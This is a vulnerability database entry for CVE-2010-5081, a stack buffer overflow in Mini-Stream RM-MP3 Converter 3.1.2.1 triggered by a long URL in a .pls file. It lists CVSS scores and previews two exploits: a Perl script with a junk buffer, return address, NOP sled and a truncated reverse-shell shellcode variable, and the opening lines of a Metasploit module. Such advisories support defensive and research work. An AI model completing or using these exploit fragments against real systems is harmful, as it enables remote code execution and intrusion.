9.3
CVSSv2

CVE-2010-5081

Published: 25/12/2011 Updated: 28/12/2011
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
VMScore: 940
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

Stack-based buffer overflow in Mini-Stream RM-MP3 Converter 3.1.2.1 allows remote malicious users to execute arbitrary code via a long URL in a .pls file.

Vulnerable Product Search on Vulmon Subscribe to Product

mini-stream rm-mp3 converter 3.1.2.1

Exploits

#Mini-Stream RM-MP3 Converter v3121 (pls) Stack Buffer Overflow universal #By Madjix (lemail ma3andkoum madirou bih) #Sec4evercom my $junk="""\x41" x 17425; my $ret = "\xCF\xDA\x05\x10"; #jump to ESP - from msrmfilter03dll my $padding = "\x90" x 24; # windows/shell_reverse_tcp - 739 bytes # wwwmetasploitcom my $shellcode = "\ ...
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions Please see the Metasploit # Framework web site for more information on licensing and terms of use # metasploitcom/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking includ ...